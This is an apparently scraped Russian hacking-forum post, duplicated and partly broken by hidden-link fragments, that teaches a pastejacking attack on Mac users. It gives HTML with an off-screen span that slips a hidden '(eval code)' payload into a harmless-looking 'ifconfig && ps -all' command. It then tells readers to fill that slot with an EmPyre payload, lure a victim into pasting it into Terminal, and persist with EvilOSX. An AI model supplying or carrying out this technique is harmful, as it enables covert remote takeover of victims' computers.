Приветствую, поведую Вам ознакомительную статью, о не приступном Маке и разрушу одну небылицу о том что "Мак-ось-хэ" не возможно взломать" и надеюсь благодоря этой статье скорость Стива Джобса в его оптекаемом гробу увеличится на несколько оборотов, хотя он там и так как "кура гриль"
Статья для прошареных ибо я не буду сильно вдаватся в подробности!
<p> ifconfig<span style="position: absolute; left: -2000; top: -100px;" > && ps -all && (eval code) <br></span> && ps -all</p>
Для генерации волшебного заклинания нам понадобится инструмент EmPyre
не
вставляем полученый код в код файла index.html
поднимаем наш локал сервер и принудительно)) просим)) нашу жертву сделать команду в терминале: ifconfig && ps -all как это делать, обьяснять не буду в кали есть много инструментов для этого и на борде приемов хватает!
получаем сессию в EmPyre затем закрепляемся в системе с помощью этого прекрасного инструмента под названием: EvilOSX
ну и дружно передадим привет жертвам PR-а которое покупают это мягко сказать ..овно
Скажите нищеброд от зависти мол статью выпустил как ломать "огрызки" скажу честно были у меня маки, айфоны, и даже айпад когда занимался вэб-дизайном и мои впечатления: хороший аккум., батару держит долго, вопросов нет (я не имею ввиду Iphone6) качество дисплея на высоте! для дизайна подходит на ура! Железо увы отстой.)
Ссылка скрыта от гостей
!Статья для прошареных ибо я не буду сильно вдаватся в подробности!
Ссылка скрыта от гостей
, создадим в apach-е классический файлик index.html с кодом:<p> ifconfig<span style="position: absolute; left: -2000; top: -100px;" > && ps -all && (eval code) <br></span> && ps -all</p>
Для генерации волшебного заклинания нам понадобится инструмент EmPyre
не
Ссылка скрыта от гостей
только его с великой Империей вставляем полученый код в код файла index.html
поднимаем наш локал сервер и принудительно)) просим)) нашу жертву сделать команду в терминале: ifconfig && ps -all как это делать, обьяснять не буду в кали есть много инструментов для этого и на борде приемов хватает!
получаем сессию в EmPyre затем закрепляемся в системе с помощью этого прекрасного инструмента под названием: EvilOSX
ну и дружно передадим привет жертвам PR-а которое покупают это мягко сказать ..овно
Скажите нищеброд от зависти мол статью выпустил как ломать "огрызки" скажу честно были у меня маки, айфоны, и даже айпад когда занимался вэб-дизайном и мои впечатления: хороший аккум., батару держит долго, вопросов нет (я не имею ввиду Iphone6) качество дисплея на высоте! для дизайна подходит на ура! Железо увы отстой.)